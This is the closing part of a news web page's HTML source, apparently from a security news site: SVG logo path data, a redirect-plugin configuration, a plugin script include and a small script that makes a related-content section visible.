d="M27.17,12.6h4.21v.84H27.17Zm0-1.68h4.21v.84H27.17Zm0-1.68h2.52v.84H27.17Zm0-1.69h2.52V8.4H27.17Zm0-1.68h2.52v.84H27.17Zm-.84-4.2.28-.85h4.77v.85Zm-.56,1.68.29-.84h5.32v.84ZM25.22,5l.28-.84h4.19V5Zm-.56,1.68L25,5.87h2.22l-.27.84Zm0,6.73-.28-.84H25Zm-.55-1.68-.29-.84H25.5l-.28.84Zm-.56-1.68-.27-.84H26l-.27.84ZM23,8.4l-.29-.85h3.9l-.28.85Zm-.57-1.69-.27-.84h2.22l.28.84Zm-2.8,2.53h2.53v.84H19.63Zm0-1.69h2.53V8.4H19.63Zm0-1.68h2.53v.84H19.63Zm0-.84V4.19h4.19l.29.84ZM18,12.6h4.21v.84H18Zm0-1.68h4.21v.84H18Zm0-7.57V2.51h5.32l.28.84Zm0-1.68V.82h4.76l.29.85ZM14.16,9.24H17a2.23,2.23,0,0,1,.07.37,2.49,2.49,0,0,1,0,.47H14.16Zm0-5h2.95a2.38,2.38,0,0,1,0,.46A2.18,2.18,0,0,1,17,5H14.16ZM9.11,9.24h2.52v.84H9.11Zm0-1.69H16a5,5,0,0,1,.4.4,2,2,0,0,1,.32.45H9.11Zm0-1.68h7.57a2,2,0,0,1-.32.45,4.89,4.89,0,0,1-.4.39H9.11Zm0-1.68h2.52V5H9.11ZM7.42,12.6H16a3.09,3.09,0,0,1-1,.62,3.73,3.73,0,0,1-1.32.22H7.42Zm0-1.68H17a2.47,2.47,0,0,1-.15.46,2.24,2.24,0,0,1-.21.38H7.42Zm0-8.41h9.22a1.91,1.91,0,0,1,.21.38,2.47,2.47,0,0,1,.15.46H7.42Zm0-1.69H13.6a3.73,3.73,0,0,1,1.32.23,3.09,3.09,0,0,1,1,.62H7.42Zm-5,8.42H4.9v.84H2.38Zm0-1.69H4.9V8.4H2.38Zm0-1.68H4.9v.84H2.38Zm0-1.68H4.9V5H2.38ZM.69,12.6H6.58v.84H.69Zm0-1.68H6.58v.84H.69Zm0-8.41H6.58v.84H.69ZM.69.82H6.58v.85H.69Z" /> </svg> </span> </a> </div> </section> </div> </div> <script> window._appInfo = window._appInfo || {}; window._appInfo.newsCredAPIKey = "YXJ0aWNsZT1lMzhlMzdjNGEwNjkxMWVmYjg1M2FhOWE2N2MwMmE2Mg=="; </script> <!-- FOOTER SCRIPTS --> <script type="text/javascript" id="qppr_frontend_scripts-js-extra"> /* <![CDATA[ */ var qpprFrontData = {"linkData":{"https:\/\/securityintelligence.com\/defining-security-intelligence\/":[0,0,"https:\/\/securityintelligence.com\/defintion-security-intelligence\/#.VS_NwpNnuZA"],"https:\/\/securityintelligence.com\/security-vulnerability-management-its-about-outcomes-not-activity\/":[0,0,""]},"siteURL":"https:\/\/securityintelligence.com","siteURLq":"https:\/\/securityintelligence.com"}; /* ]]> */ 
</script> <script type="text/javascript" src="https://securityintelligence.com/wp-content/plugins/quick-pagepost-redirect-plugin/js/qppr_frontend_script.min.js?ver=5.2.4" id="qppr_frontend_scripts-js"></script> <script> setTimeout(() => { document.querySelector(".related_content").style.visibility = 'visible'; document.querySelector(".related_content.article.article_grid.article__mobile--card.article--IBM_blog > c4d-card > c4d-card-footer").shadowRoot.querySelector("#link").style.justifyContent = 'flex-start'; }, 100); </script> </body> </html>